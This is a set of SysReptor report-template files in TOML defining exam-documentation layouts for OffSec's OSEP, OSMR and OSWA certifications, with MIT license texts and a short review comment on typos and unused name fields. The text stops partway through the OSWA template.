name = "OSEP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"enumeration",
"compromise",
"postexploitation",
"privilegeescalation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSEP Exam Documentation {.in-toc.numbered}
The Offensive Security OSEP exam documentation contains all efforts that were conducted in order to pass the Offensive Security Experienced Penetration Tester exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Experienced Penetration Tester certification.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform an external penetration test against the Offensive Security Exam network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including enumeration and post-exploitation. The exam report is not meant to be a penetration test report, but rather a writeup of the steps taken to locate, enumerate and compromise the network.
Enumeration and post-exploitation actions that lead to subsequent attacks with successful compromises should be included in the report.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High level summery of findings, including the depth of compromise.
* Methodology walkthrough and detailed outline of steps taken including enumeration.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshot of any local.txt, proof.txt or secret.txt.
</markdown>
<pagebreak/>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
</section>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt/Secret.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.enumeration">
<h3 class="in-toc numbered">Pre-Compromise Enumeration Steps</h3>
<markdown :text="finding.enumeration" />
</div>
<div v-if="finding.compromise">
<h3 class="in-toc numbered" >Compromise</h3>
<markdown :text="finding.compromise" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation Enumeration Steps</h3>
<markdown :text="finding.postexploitation" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Local Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #3d85c6;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSEP Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt, proof.txt or secret.txt"
required = true
[finding_fields.compromise]
type = "markdown"
label = "Compromise"
origin = "custom"
default = "TODO Provide a description of exploitation steps to compromise the machine and obtain shell access, the steps taken should be able to be easily followed and reproducible if necessary. Only the steps that ended up working are required. Include any custom code or references to public tools."
required = true
[finding_fields.enumeration]
type = "markdown"
label = "Enumeration"
origin = "custom"
default = "TODO Provide relevant techniques and methods used to perform enumeration prior to initial compromise, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt and secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt and secret.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using `ipconfig`, `ifconfig` or `ip addr`.
"""
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post-Exploitation"
origin = "custom"
default = "TODO Provide relevant post-exploitation enumeration steps related to the network or local privilege escalation, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = "TODO Provide a description of exploitation steps to escalate privileges on the machine if applicable, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSEP Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "192.168.X.X"
cvss = "n/a"
id = "b8395ecb-13fe-48dc-812d-5c739c448510"
proof = "TODO Provide the contents of local.txt, proof.txt or secret.txt"
compromise = "TODO Provide a description of exploitation steps to compromise the machine and obtain shell access, the steps taken should be able to be easily followed and reproducible if necessary. Only the steps that ended up working are required. Include any custom code or references to public tools."
enumeration = "TODO Provide relevant techniques and methods used to perform enumeration prior to initial compromise, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt and secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt and secret.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using `ipconfig`, `ifconfig` or `ip addr`.
"""
postexploitation = "TODO Provide relevant post-exploitation enumeration steps related to the network or local privilege escalation, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
privilegeescalation = "TODO Provide a description of exploitation steps to escalate privileges on the machine if applicable, the steps taken should be able to be easily followed and reproducible if necessary. Include any custom code or references to public tools."
[[assets]]
id = "29d56052-480c-4b61-bd63-d8f48969975c"
name = "LICENSE"


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,576 @@
format = "projecttypes/v1"
id = "ea7efb89-8c2b-4008-99e2-419611fdb979"
name = "OSMR Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"initial_analysis",
"vulnerability_discovery",
"exploit_creation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSMR Exam Documentation {.in-toc.numbered}
The Offensive Security OSMR exam documentation contains all efforts that were conducted in order to pass the Offensive Security macOS Researcher exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security macOS Researcher certification.
## Objective {.in-toc.numbered}
The objective of this exam is to solve four given assignments as described in the control panel. The student is tasked with following a methodical approach in analyzing and solving the assignments. The exam report is meant to be a writeup of the steps taken to solve the assignment, including any analysis performed and code written.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting, while removing any headlines that are not relevant to a specific assignment.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High-Level summary of assignment solutions.
* Methodology walkthrough and detailed outline of steps taken through analysis and all written code.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshots of proofs.
</markdown>
<pagebreak/>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
</section>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Assignments</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.initial_analysis">
<h3 class="in-toc numbered">Initial Analysis</h3>
<markdown :text="finding.initial_analysis" />
</div>
<div v-if="finding.vulnerability_discovery">
<h3 class="in-toc numbered">Vulnerability Discovery</h3>
<markdown :text="finding.vulnerability_discovery" />
</div>
<div v-if="finding.exploit_creation">
<h3 class="in-toc numbered">Exploit or Bypass Creation</h3>
<markdown :text="finding.exploit_creation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #a0a0a0;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSMR Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Assignment"
origin = "core"
default = "TODO Assignment Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of local.txt, proof.txt or secret.txt."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt or secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt or secret.txt found must be shown in a screenshot that includes the con-tents of the file, as well as the IP address of the target by using ipconfig.
"""
required = true
[finding_fields.exploit_creation]
type = "markdown"
label = "Exploit or Bypass Creation"
origin = "custom"
default = "TODO Provide a description of steps to create the exploit or security control bypass. At the end of this section the full exploit (or bypass) code should be developed while an explanation of each step should be performed."
required = true
[finding_fields.initial_analysis]
type = "markdown"
label = "Initial Analysis"
origin = "custom"
default = "TODO Provide relevant techniques and methods used to perform enumeration and discovery of the application and/or the environment. The steps taken should be reproducible and easy to under-stand. Include any custom code or references to public tools."
required = true
[finding_fields.vulnerability_discovery]
type = "markdown"
label = "Vulnerability Discovery"
origin = "custom"
default = """
TODO Provide relevant analysis steps to locate vulnerability inside the application or environment, this includes results from static analysis and/or dynamic analysis. Explain the vulnerability identified.
Only the steps that ended up working are required.
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSMR Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "TODO Assignment Name"
cvss = "n/a"
id = "cc0cb8c0-5ee8-4fc9-b1a0-a659e31ac2fb"
proof = "TODO Provide the contents of local.txt, proof.txt or secret.txt."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the local.txt, proof.txt or secret.txt files obtained from your exam machines must be submitted in the control panel before your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each local.txt, proof.txt or secret.txt found must be shown in a screenshot that includes the con-tents of the file, as well as the IP address of the target by using ipconfig.
"""
exploit_creation = "TODO Provide a description of steps to create the exploit or security control bypass. At the end of this section the full exploit (or bypass) code should be developed while an explanation of each step should be performed."
initial_analysis = "TODO Provide relevant techniques and methods used to perform enumeration and discovery of the application and/or the environment. The steps taken should be reproducible and easy to under-stand. Include any custom code or references to public tools."
vulnerability_discovery = """
TODO Provide relevant analysis steps to locate vulnerability inside the application or environment, this includes results from static analysis and/or dynamic analysis. Explain the vulnerability identified.
Only the steps that ended up working are required.
"""
[[assets]]
id = "675262f8-fd52-4714-bf61-57de672585df"
name = "LICENSE"
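Review bot: The default texts in this OSMR project type still carry line-break hyphens from a copied document: `con-tents` in `finding_fields.screenshots` and `under-stand` in `finding_fields.initial_analysis`, and both strings are repeated in `report_preview_data.findings`. Since these defaults presumably pre-fill new findings, they should read `contents` and `understand` in all four places. Separately, `report_fields.firstname` and `report_fields.lastname` are `required = true`, but the `report_template` in this file never references them; the cover prints only `report.osid` and `report.mail`. If nothing outside this file reads them, dropping `required` would avoid collecting a student's name that the rendered report does not show. The `osid` default `"XXXXX"` also differs from the preview value `"OS-XXXXX"`, so one of the two is probably not the intended format.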


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


@ -0,0 +1,562 @@
format = "projecttypes/v1"
id = "15e47af0-c357-4a5e-a033-c31d51f249d0"
name = "OSWA Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"vulnerabilities",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSWA Exam Documentation {.in-toc.numbered}
The Offensive Security OSWA exam documentation contains all efforts that were conducted in order to pass the Offensive Security Web Assessor exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Web Assessor certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Any additional items that were not included
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
